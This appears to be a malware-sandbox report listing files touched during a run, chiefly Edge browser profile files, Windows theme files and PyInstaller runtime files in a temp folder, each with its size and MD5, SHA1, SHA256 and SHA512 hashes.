015a4b865e82f4dfea98ae425b9e0e2b09e756886f77b390ce207b1e6d3a32166d578d24cf5070e091a12f35c3d72467be3249c9e122770f9de320077ae76e79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
0887bd3ebda98014b8ea9a2c51481342

SHA1
c242f8a8795597f2dada5721de3be8f29843a49c

SHA256
d4d13ba328cb1e36db1f185394aa77cf444edf7635af845e05eebfe71d5a1030

SHA512
d739e77dd2b42cfe69aa8236a5db67df8ed41b34d43596ca92d7c7cb548394d11debb242c807395bbbf93a46c08813b17653ce0af1836e98dcef37fb64034019

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
3f4061d792c61f42382fce508ff4add0

SHA1
836f6284a72e4b04b97de6d470caa6e4dcc4aaa4

SHA256
ed051e443e40f39caf2c2e67d5636caeb6d7607f9abccae0ec58dded8dab80a7

SHA512
f9a9f2621a87bfb6b9d5364b2202ac9c407ac3c2da63c8eb0b975cbb1eda12a04a1ee9471ef886dd1dc1fea069e93458bda08aea960ae6e39df3806b2a060632

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
a603206433a8236e0fc3973f2c6ed6c7

SHA1
d7dc92f43d070e8a1fa985daddedaee5377b247a

SHA256
a81e11e058b166e8ecb5086be841c32d21efd45d708c9db75917c6aaf2c88bb7

SHA512
c5ad85e72380899a45a54bad3721c9124585ca894d70a68f527bd90974e2a672c3e796cf6e847b2cb3d2419a5eab9c48f815cb4910637ff6c4c2595db29de807

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
ba6db016dc8239f02f9e09938958c3fa

SHA1
e5d6f3d6bfae6fec3affaaf32fb1be0e02d38433

SHA256
67ffb52b07528bbabdb8c20ad12499c58008347901c76e1481296d48f6f03584

SHA512
827acf83f0e7a0511079d2354ba3290652e86f3defcdbafe2bdc51d0a3eec48a0f06310a53f9a9fd4fa62f261f905f37e6ca3a43fdb5649c0302d73085c7deb8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
af9d9d50acf64937cd223b3161967512

SHA1
2939a8d2ca047f9f023fdbe9809aff92724c1e3f

SHA256
a018241be2b2d3ec0ee58c46969d3ae070594ff678def609c935a89880f4925d

SHA512
20fc786f6694ba07862e0a176c65128e0649d1d4a74b3dffba8aa06c60ce38de5f0c9632f9b888163568467743eafc6e43507c75e6c9866cd58ec457d3e5743b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
413KB

MD5
559cc5a22d1284731992f941409d7c3e

SHA1
c5e25d309fff4e4a29246c098c450caf4a500698

SHA256
4b065ef444d1e69407ebfd1a93cebbc2c19aa19ad41e33afaa1147d772a8e945

SHA512
6884145e13f308ec22f889be9d15555605103c00a28741a15a2938ecd10a03507651f506fb6abcbcdd86f32de844204ceb2e980203af25ddbbfe5ba98d6d9632

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
4e45ab1e9bba86c6760ad683f7675d20

SHA1
30d605046a05431af8551a4a8a3b6ecec497babb

SHA256
927ce9d0355a170ce7c78f84eae426ee38e958e2071e8b65ca6381b3112d9303

SHA512
210a92d3aeb1effac8e29b12f075466adea258a10775398fd230a5c9f69d0e42c1e2e51dda00a16b230926830cfc277e10f335fa7c20275007b1ca9ba98c5973

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
36KB

MD5
4ec0e0653377849b5afb373c7b022ad1

SHA1
36d0b872ffe66b54e115067bee620f363f5cd9e3

SHA256
167625eabbda86ec48a6401c53068e81ed500229e0a2e13861428507ee74b29e

SHA512
2f14c1e632784bbc1216dc5772b7ac528649e7cdd1c8e9bf61baa149752fac6cc028e0bbd54848f50502a560d8196a2ce8f1685f476736407485797b8af3055d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

Filesize
21KB

MD5
fa08851fc58ba9e82f89da1ae5c15e1a

SHA1
d2884f5c3ea4e92bb9f2bbc1aec780f316b3295e

SHA256
8975e18b1be2aeeeac16642a5db0c86310ef81828349901b21c700a63f256f0c

SHA512
b1c6a932a2fdd5c9ef27d5342d0dd23a50461a4406b9b181e338339e6c3e3ee36e53bb8687384c028c5d5853872091ea9e9d866dd56173f2de16f5311224b21f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\default_cloud_config.json

Filesize
13KB

MD5
cf9a0cd1d5f9c8cdeb87ef3f7d30d15c

SHA1
c543e62aab24c205db6014414161c13375e9a71c

SHA256
b24f36278e4c85a8fcd66021d48c69d6b07be605673e02f0fe185bf3319f47f4

SHA512
39ad5c5753e5398906b94ab039d2eae7fe420fe35a53f190bda84d4f9262f3b14841cdf4ec76cdbff6a4578a26ab1e6c4b11ba326ec8cc38a2e2904a6f2c0d8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
20KB

MD5
553abb2e47e9a716b53e5988ab81215d

SHA1
ebd055c2f74667a95363059b34570090dbed773c

SHA256
dd925484610951a4eeea0b8a62fa4d3895f9a87d3d194d3bb7f34c07ea4c9016

SHA512
960ab74f6d38b713c4850c7a88630b10f988446f6e7213baf533a87133ccafe641ac773540f01ca6d31952859160c910c7411223d3323981f31895b3ce5c4ae9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
900B

MD5
013be48050a6efe97c36fe7f69fa922d

SHA1
b6e02eee1ab26227d6c2a0c99115c153763c1989

SHA256
ea3be622e3b7a6ebee786ab8a7dc0322debf24e969059470ade42f3a2cb4f504

SHA512
200d0811a2dae3c6231c07909e57e4ea9b39a40a776b3107ca766054f103aed646cd264919292327766c3bd6951a324645065bd2812dd11e3ae7f5bdef66133e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
467B

MD5
d803a6f0fda57b61245892ebbb20419f

SHA1
3e3cafd91c6a4ce094a663e87c543566f7bac042

SHA256
3eeaa5027d4056c0d316a1d1041aa7eb57c5e45cee53903a2256eafc14478ea0

SHA512
9be733e7f997654d3733558abfba72399d75675bf6a046523d0ef5df6554deb446de654df16f59400d193bd3c22252c16880f94acd1b3b6640d4ffd9e6203699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
464B

MD5
5b0f76c94dc6b792699bf175f863817a

SHA1
0de869129410e16e515b60b88a37737a77bceef7

SHA256
01884623fedcc60e0cb1c769a6ca3cd8d9bd31ed51014615eb4bf806f85a21fe

SHA512
5072b1e07cfcdb2436c8aa14069708dbf38452f9ec46f04d812fae103c409bed940660614b51b36bb2f03ac8014227c5f03b245eb8be7fdf0c659afea2b1afd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

Filesize
464B

MD5
1a2b2d0c5dcd8fa6f0605bf99585d8c8

SHA1
10cf7d03de87323094827863b694b70c65ee334c

SHA256
93685d799e769f75b5e37c78bd0f899071f744b6c597ef8204da481087210656

SHA512
2ef16ebbc95c704a2dace69c9f56f8821101665e1bd8cd3c62a9f291de33387db650d930eed9a26497ccac073e2ea3c929ce45fd8cc7aa5e0b19fb6409e88dba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

Filesize
22KB

MD5
3f8927c365639daa9b2c270898e3cf9d

SHA1
c8da31c97c56671c910d28010f754319f1d90fa6

SHA256
fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2

SHA512
d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.1.37.0\edge_checkout_page_validator.js

Filesize
1.1MB

MD5
003fe9be736ed918d1fa5738e03dee2a

SHA1
1875f50d89bfa23064db1a7c2d80f97e3f4fa1e3

SHA256
3bb1b93f917e9d8e76afa18c3f6d88bd7708b26f5142b29b8e977af80e93d8af

SHA512
e6af65d2586da8a96014faeb9ce5986aeecb04145f66b32be0d2cf849d6e56c22c179ac8adb9211e7ab7cc41d9d8e0a8f7910210b8adfd810f13f43563c4c5f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\buynow_driver.js

Filesize
2KB

MD5
412352a121a62092628029e9b30158d8

SHA1
0021445df04bcd60cd83b670ce1863c42f1f4c11

SHA256
87339a1e25ccbbf120f294fd60333e292e1d631e785a9b205ed5beb0128c214f

SHA512
ffd266f1161ab996f38a6d0723e2cf96840b500cf2aa360f48b7953d448a5cd3a2fffa666d9be9c89dc4495497d5016f1199e6419a82bdf18fc99b8a8a4eb596

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-checkout-eligible-sites.json

Filesize
23KB

MD5
16d41ebc643fd34addf3704a3be1acdd

SHA1
b7fadc8afa56fbf4026b8c176112632c63be58a0

SHA256
b962497993e2cd24039474bc84be430f8f6e6ab0f52010e90351dc3ff259336c

SHA512
8d58aa30613a2376ccc729278d166a9b3ec87eca95544b9dec1ee9300e7dd987326ea42d05dca3f1cc08186685f2fdaf53c24fd2b756c1ed9f2b46436689dc74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-notification-config.json

Filesize
804B

MD5
4cdefd9eb040c2755db20aa8ea5ee8f7

SHA1
f649fcd1c12c26fb90906c4c2ec0a9127af275f4

SHA256
bb26ce6fe9416918e9f92fcc4a6fe8a641eceea54985356637991cf6d768f9fd

SHA512
7e23b91eab88c472eec664f7254c5513fc5de78e2e0151b0bcc86c3cd0bf2cb5d8bb0345d27afdd9f8fcb10be96feaa753f09e301fa92b8d76f4300600577209

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-stable.json

Filesize
81KB

MD5
05f65948a88bd669597fc3b4e225ecae

SHA1
5397b14065e49ff908c66c51fc09f53fff7caed7

SHA256
0e329e63d8457bef61d0986a521f81d747a09dadf3b1136f2011942ba14d9fc0

SHA512
ed7b767a741d18c0dd35e0311db752120e0f090d39ef976d541cbc5ae78fa32655cb3f9c27cddef6ca8091ca8bf31513254a748bc8b95353897f6198a667cf58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\json\wallet\wallet-tokenization-config.json

Filesize
34KB

MD5
ae3bd0f89f8a8cdeb1ea6eea1636cbdd

SHA1
1801bc211e260ba8f8099727ea820ecf636c684a

SHA256
0088d5ebd8360ad66bd7bcc80b9754939775d4118cb7605fc1f514c707f0e20d

SHA512
69aff97091813d9d400bb332426c36e6b133a4b571b521e8fb6ad1a2b8124a3c5da8f3a9c52b8840152cf7adbd2ac653102aa2210632aa64b129cf7704d5b4fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\128.18347.18346.65\wallet_donation_driver.js

Filesize
1KB

MD5
03abcce3f9828372d9876aa2e6fcdbb0

SHA1
cf5834e1af5f7143e62a29ae0f7ede79178b3574

SHA256
39a63d56be4f1ca950310f385e8a42f7bc2dcc0e49fefff306176182bfa4f0e5

SHA512
ef9b7decb4cfee3961006ea5c77299a48fe6a667475772f2a78e93bd4f691dc4700f8008138c574898fdcd8d717d84b8b201527ddb5a61346e05d362aeb15701

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Browser

Filesize
120B

MD5
a397e5983d4a1619e36143b4d804b870

SHA1
aa135a8cc2469cfd1ef2d7955f027d95be5dfbd4

SHA256
9c70f766d3b84fc2bb298efa37cc9191f28bec336329cc11468cfadbc3b137f4

SHA512
4159ea654152d2810c95648694dd71957c84ea825fcca87b36f7e3282a72b30ef741805c610c5fa847ca186e34bde9c289aaa7b6931c5b257f1d11255cd2a816

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
13B

MD5
3e45022839c8def44fd96e24f29a9f4b

SHA1
c798352b5a0860f8edfd5c1589cf6e5842c5c226

SHA256
01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd

SHA512
2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
54KB

MD5
68c3e8e54c918796e2077771d1ac2196

SHA1
899e8459e02006b3dd93acd83a55fc4781c975ab

SHA256
6eab402e02c4fa504c060efb15cbda1783f53062bd5842e40ebcd8feae7c7023

SHA512
a15921e67c16299bf1501a27eb895d1bd271fe1e6cf3f1f9699c34a7a2f3a8ae181486d11e39fa9877ad78b630280de277b6aaa266e28d8c6ef450b73a092cd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
9f030ce39a7e8bd690b97e609aca4c7f

SHA1
abaefd10c28077f92e7591b2f3f62b4b1f05d453

SHA256
ca8fe1ce2cfbea1dde51b978d1a4da88eb4eb6dfc2971d02dd5e46e69799ca12

SHA512
6396be55fcafa0830f494f9e8c5a1259aac020bc992df541a89c714a7521805aac442cb82a12877930c61d095fdcb8cd5228b9a1dc9cc02d527e38faf2ee4d0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
3c38dded0cb7b7364a10960ba0a2bf24

SHA1
dbe3ae2fd1166781d6d20ee20cb4f9c7e05d62fd

SHA256
f665ccef4cd1eb408acf0ad1fb4738182731f5b0fdbaaaadfaf7464417b105dc

SHA512
58739cd34feaf885e4533d3263b4dcc32f6f17a180e38a22e4b188c58af6cc68dadee06ed139f03545ea236d27e74eef500e3f8d82b3f878d8c98fdb2887574c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
55KB

MD5
1a46b5d1954ceec8804651c15776bd66

SHA1
f6c279b117d9df694dce6000f20915251cc2f561

SHA256
5c2ae39cbf8674902f3cfabf3fd811cab605ae8c2f70e0322b1fcbcbd915a8fc

SHA512
acdd3ae2eabe68dec47f5289a446f952c8367ad9aea9d98e8726d32c4897176c29003900cd76327d90419da013823763b3b3268b18e6506d5b4ea47d1421ed09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
49KB

MD5
0b8e782d80bc1c6326d3ec05551ac1cd

SHA1
9fa26f0c30f83b5a5cc30e60476cbd1da8f8145a

SHA256
08eea72f5926f7a858cbe4c16975be9fae1a5202691fc7268e40b98067e7fe72

SHA512
9dc10d198908cb2b7ec12cdc167aa27441965b52fdfe0eb7ed5e7b5dc335945475bff35886cbfa48742963939ceb18937cefe23241233d930442b5a41fd5f237

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
e07a6263ed4b540a62e789023d082433

SHA1
023a0b51f5416542c74d0507c26138e9c17d81a5

SHA256
ec2940164135f592c3323f494b76f8fa30a3aa492368b5fca03da679dbe38a22

SHA512
d92736e1ef4d5586483f260e8e7df6a3fc4faf58c2e7d7ac379866e23fb0194606e592a76a75942f4f67831a94a340e4f83b458aead4bcd2cb5a0d8ae65ffc89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
49KB

MD5
6e19a00a9a5525c4b09188238a220892

SHA1
b0b88c8691333eafb84704ef34e72df1d9a16556

SHA256
616194ab28bde001c7001f0c960fce48f804aacb129fa4d2100c919f4b9ce49b

SHA512
1026be7c22e7330b6dc658ee009eb83780292aee2b1c8b4f6b5ef3d9d626577d9c6777df46a56aa4b20a23d8af8ded6ca41f9f16043c0162bd411dbbee924eee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
52KB

MD5
be0d8b3c77650a2308a2677766f3868d

SHA1
1369c8aed9a72b9ba0f393e0cbdc6040473f52bd

SHA256
b7a1cd322977e4619ae6f1bb4672c248d810d433dae0999bd6cd3f3329d55f5f

SHA512
290ddc3ef1d00873e2fc762846e5741eb90e3c5869a5fe103a3b6e3adaa00f2613269b210437292f2d6cd901f3a7cdb70c8e76b59379c9118a9972953ef3afa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
65KB

MD5
54356b5d7b2b61bcaae215842299e7d0

SHA1
5f7adfbbcc6deb327d2b6492ebb98a091526126a

SHA256
024535cdf81d5670ac5b788d587ab585a24fa350c3b8ec126d4ec7bc1a5e9e6a

SHA512
f9138ef63a8bd2176e21bb12a9939f2e386e29b0d94cf397d198e5f7c8cd02f56481fd8c945a96b6241248086430d623fb15e58437cc20fe1710f756e1908e2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
62KB

MD5
24325754a984c91efa0b9c565d070a72

SHA1
0b3090e82535086dc4e1494d170be9d0262e35c1

SHA256
38744c66a3ba307f8f88fe22974c530453497ea77d71ed238d7c298be08a2e25

SHA512
58f90c419f7374d6999182e484f12784f3f8916dc5a355100fb44b398b0a7ec654826494dc9d5e6539f7dc88194225aaeb5f7a5f889ab3bc0c4da2efe46aaa0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
55KB

MD5
df497503fd07a8a55eb8407fd3a693c5

SHA1
79fe2da9b564123c31c664d4e8ef2c34527cab26

SHA256
f88ecb77fd6302370c8b3e611ebab2f8fb9e1836c8e015f579edc14ca8ecc5d6

SHA512
2ce4208210a5022618a72599a61d43168c0072172b5db5ca933f34d74f624c2b8342be5e238eaeadd319eaced5040eddced75f9640a7d8874de7019ede360c81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\22.0.0.0\crs.pb

Filesize
289KB

MD5
2b59269e7efdd95ba14eeb780dfb98c2

SHA1
b3f84cbc37a79eeecb8f1f39b615577d78600096

SHA256
ff2ced650772249abb57f6f19c5d0322d6df22c85c7cf2be193b6134e1b95172

SHA512
e4b454db2248021e0d198805ea54f1c0cfd84b9716a9348b1d0e0acb7c6fb5dd0839e532a5eb6d4410ab759d6688dd6cce8375ad55a150d738d280993142e9d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\22.0.0.0\ct_config.pb

Filesize
8KB

MD5
811b65320a82ebd6686fabf4bb1cb81a

SHA1
c660d448114043babec5d1c9c2584df6fab7f69b

SHA256
52687dd0c06f86a2298a4442ab8afa9b608271ec01a67217d7b58dab7e507bdf

SHA512
33350cce447508269b7714d9e551560553e020d6acf37a6a6021dc497d4008ce9e532dd615ad68872d75da22ac2039ef0b4fa70c23ec4b58043c468d5d75fd81

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\22.0.0.0\kp_pinslist.pb

Filesize
11KB

MD5
0779206f78d8b0d540445a10cb51670c

SHA1
67f0f916be73bf5cffd3f4c4aa8d122c7d73ad54

SHA256
bf0945921058b9e67db61e6a559531af2f9b78d5fbedb0b411384225bdd366ec

SHA512
4140b2debe9c0b04e1e59be1387dca0e8e2f3cbc1f67830cbc723864acc2276cde9529295dcb4138fa0e2e116416658753fe46901dfa572bdfe6c7fb67bd8478

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules\36\10.34.0.76\Ruleset Data

Filesize
2.8MB

MD5
6a62b26b738ffda1414b1e45b3b97c12

SHA1
ff44417a79841f948bdbeec9049f9fb59d16dc9f

SHA256
da3927c997d3bb2326e97a8dd7835c28f50ad8c4a9dd407669f20730c0159207

SHA512
820caca570523600a057dbedd38b7e3b375d6427d716cb74d0aee0825e621268a9f418f135443e5bc6bd7b9a1fbb8eb6676324d46f9111e56404b8953f23de53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.76\Filtering Rules

Filesize
1.8MB

MD5
d7c9c6d2e1d9ae242d68a8316f41198c

SHA1
8d2ddccc88a10468e5bffad1bd377be82d053357

SHA256
f215127185b2ee6b01e12b6ca75d3e5c4e454598dd4aed36124ae13d59afd547

SHA512
7fd14824e9200dd99e1fd2cee402656dc0cfc3d0a60058c5eb05c68e9e65b7f0b47e550fb4d6c2b59eba204dbf3ef9e69dc9723b43a9b3ccd5412d6b77715fc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\10.34.0.76\LICENSE

Filesize
24KB

MD5
aad9405766b20014ab3beb08b99536de

SHA1
486a379bdfeecdc99ed3f4617f35ae65babe9d47

SHA256
ed0f972d56566a96fb2f128a7b58091dfbf32dc365b975bc9318c9701677f44d

SHA512
bd9bf257306fdaff3f1e3e1fccb1f0d6a3181d436035124bd4953679d1af2cd5b4cc053b0e2ef17745ae44ae919cd8fd9663fbc0cd9ed36607e9b2472c206852

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Typosquatting\2025.4.14.1\typosquatting_list.pb

Filesize
626KB

MD5
cd8f0547b4d0459fc40caa32edd2ae48

SHA1
f2a2267b07c94eee76441654294d4bee793913fa

SHA256
b7ced53d106f852e82076b850fe7794ddeaeaf137818339b95a35ffc170277a7

SHA512
0f1790dd996e27dbbf75a6520279941dcdd002429595e02646ceddae317f87fe34ca01049735ed753904ceccc1ecc24080e22c34ba6343ebb155c8e7a89085d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Well Known Domains\1.2.0.0\well_known_domains.dll

Filesize
572KB

MD5
f5f5b37fd514776f455864502c852773

SHA1
8d5ed434173fd77feb33cb6cb0fad5e2388d97c6

SHA256
2778063e5ded354d852004e80492edb3a0f731b838bb27ba3a233bc937592f6e

SHA512
b0931f1cae171190e6ec8880f4d560cc7b3d5bffe1db11525bd133eaf51e2e0b3c920ea194d6c7577f95e7b4b4380f7845c82eb2898ad1f5c35d4550f93a14b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Filesize
2KB

MD5
ef3bc7c5d2f95eee58f153a2c033da47

SHA1
b738b85c1d7827fddb334cf528bd50200ff376e4

SHA256
678b01ff3af971b70fece959aa6a67534fbc8e927b384a4e11d617ecd8de64f5

SHA512
788307887466930c321b70f7f7ef3b2f607485572d305b126e11a570abc5eab7b866c533594b23dc4cd6d17af756dc1d492858b17993f36cc234000af4efaea6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

Filesize
1KB

MD5
e812716ad83062cbcd4aa946c92c55ea

SHA1
d5dd9db7bc7fec44fd70c060a3232837e2aec2f4

SHA256
29c8c7c32c9902123ffc7d630f5be4bd13e4969439e2595611e42eb8d440eaf2

SHA512
5edd490794f02fa62f57755204644d0b2ad1527f9e727b31d525088e0e8ce205037b47a76d031d823b2b7e3a9c937a0adbb3f623831eb96b9717fc00bad51b01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

Filesize
1KB

MD5
393dc379d5cc997e591824af0699d3a4

SHA1
69473ed26e4b616d0e9f1b39adccdfc95aaad9f1

SHA256
6745c7d1fa6eede44202e25449eff738a58677bdefeb50028fa0b93873828a22

SHA512
6e630075904dc3645830402d3c336b29acbb296dcc35b7b407fb0c470b867eb90d744da2d5a81e78aa6ef2bcbd03b30bdf62badb1424a0f19592d79f1dd36b29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

Filesize
1KB

MD5
bee172dd1938c00450fb7e2442c3ec8e

SHA1
547683c459ae154b4babe72b614fdfb8c208ace0

SHA256
c9701951ef5aa94d287cfcb86b7577e4f70527ec1cae607e0432815817cc82e5

SHA512
ba443277ce0c32837c56d32cdf8d284047645be473bfa1637d9848589ad510e3af9ccaf329d31f48101ce354618492edba472e992763058ec27b04990b18707f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

Filesize
1KB

MD5
373f1257dc42060025f14d22ef1a2dff

SHA1
e7c18064ecbcff13fa4e92dd01ef663dd5e16702

SHA256
9af2f776f0834f51c8d5dc1306ebb53c524b093ecf022937cb2ee1c6b8b88409

SHA512
c1f0fa99bb26c09b30441852230aceb5f81fc2d1d87bfd6abc123f1a2a0485702f1eef953faf9316dc243fc0724da4a03cb532b2850c7fc66fe4cb81e47bc446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Shrek\Shrek.theme

Filesize
2KB

MD5
c538827d520fcea6dcca6b4c82b12216

SHA1
ce678958589c99887a3db11a84d13c20a6f9a311

SHA256
81c4e9fc36c111a1bf3dc3cad8fb374c0fdb9e5336ddfe169dc82698ebe206ae

SHA512
3a273376a546d5fc49df48bb84f3f3c92226eca5bdbc15f5496be92f789b28603246378a190f4ce481b25f475439923b379bc9fed096b4f55061cd64d2c7bd3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Shrek\Shrek.theme

Filesize
5KB

MD5
b432cb6125ff851dc946fcf44472a61a

SHA1
3d83200ddccc8b59f4f4df367dd9592bd56894cc

SHA256
f12abea4f3b1e955ac56a0533ac642163dbe69a0b096899aa8c7a02effdb3be2

SHA512
a42534675ea9d0f5af949a06d1c8bb369420912c1d29aa548d97d1aa8161bbcb37ad6bcef855e8956824b4c932e5fb1098df0ed4ed0a275ea49fc085d7bcc413

Download Submit
C:\Users\Admin\AppData\Local\Temp\TP_8ED4.tmp

Filesize
4KB

MD5
99d13b3244f454cc177f8b758d0a921c

SHA1
a1564b845587103090d63ea7bd7202f832b7df12

SHA256
d36a371e3b1a57f8938984c11088df28f68f26a6975b7abf59ff7f89ddfa73e3

SHA512
a4137c3447bd75f6459c7d2ab0a33dd911a891d68de1a2d484999686765aa89a7cc13f8987f91c6808c7eeabda35c282c41a8f7a224210a52138196778f05301

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19922\VCRUNTIME140.dll

Filesize
94KB

MD5
11d9ac94e8cb17bd23dea89f8e757f18

SHA1
d4fb80a512486821ad320c4fd67abcae63005158

SHA256
e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e

SHA512
aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19922\_ctypes.pyd

Filesize
53KB

MD5
b1f12f4bfc0bd49a6646a0786bc5bc00

SHA1
acb7d8c665bb8ca93e5f21e178870e3d141d7cbc

SHA256
1fe61645ed626fc1dec56b2e90e8e551066a7ff86edbd67b41cb92211358f3d7

SHA512
a3fb041bd122638873c395b95f1a541007123f271572a8a988c9d01d2b2d7bb20d70e1d97fc3abffd28cb704990b41d8984974c344faea98dd0c6b07472b5731

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19922\base_library.zip

Filesize
858KB

MD5
76c8e798ad9e043d47777c41140a44d9

SHA1
a80c97adcf42f8beb747e74490981a60e3b58ca8

SHA256
33f9a3f3b7177fdf677c510db7466fb75c3ced0b44f69b0c86b922ae0bbb9765

SHA512
a96a58f805150348c78a5ac0f89ec88fbf5307e25f8ca9e4e03d737dd8898b2871d1757d0e22cdb051766752b0eeb526fd60410b76d7bb32bd107f83c81b941a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19922\python3.dll

Filesize
60KB

MD5
a5471f05fd616b0f8e582211ea470a15

SHA1
cb5f8bf048dc4fc58f80bdfd2e04570dbef4730e

SHA256
8d5e09791b8b251676e16bdd66a7118d88b10b66ad80a87d5897fadbefb91790

SHA512
e87d06778201615b129dcf4e8b4059399128276eb87102b5c3a64b6e92714f6b0d5bde5df4413cc1b66d33a77d7a3912eaa1035f73565dbfd62280d09d46abff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19922\python310.dll

Filesize
1.4MB

MD5
90d5b8ba675bbb23f01048712813c746

SHA1
f2906160f9fc2fa719fea7d37e145156742ea8a7

SHA256
3a7d497d779ff13082835834a1512b0c11185dd499ab86be830858e7f8aaeb3e

SHA512
872c2bf56c3fe180d9b4fb835a92e1dc188822e9d9183aab34b305408bb82fba1ead04711e8ad2bef1534e86cd49f2445d728851206d7899c1a7a83e5a62058e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19922\ucrtbase.dll

Filesize
1.3MB

MD5
5dd82151d2d8e2c0f1fba4ffb493baed

SHA1
12e24daa8902eb0c46cd8497666633f7ce9a8b58

SHA256
ee847c9d37eb901945ddccc2de73f657e3e92b148ae863b63e7f97d05ed558cb

SHA512
d00ba48b4614d2822e26c3bbdfaa171792dfab52bb50f16e66bdbb53efcef3d9b0e2d35816a40c787a63f5fdd8cc494ec5172c001f25e0ae42645cef330ddf5b

Download Submit
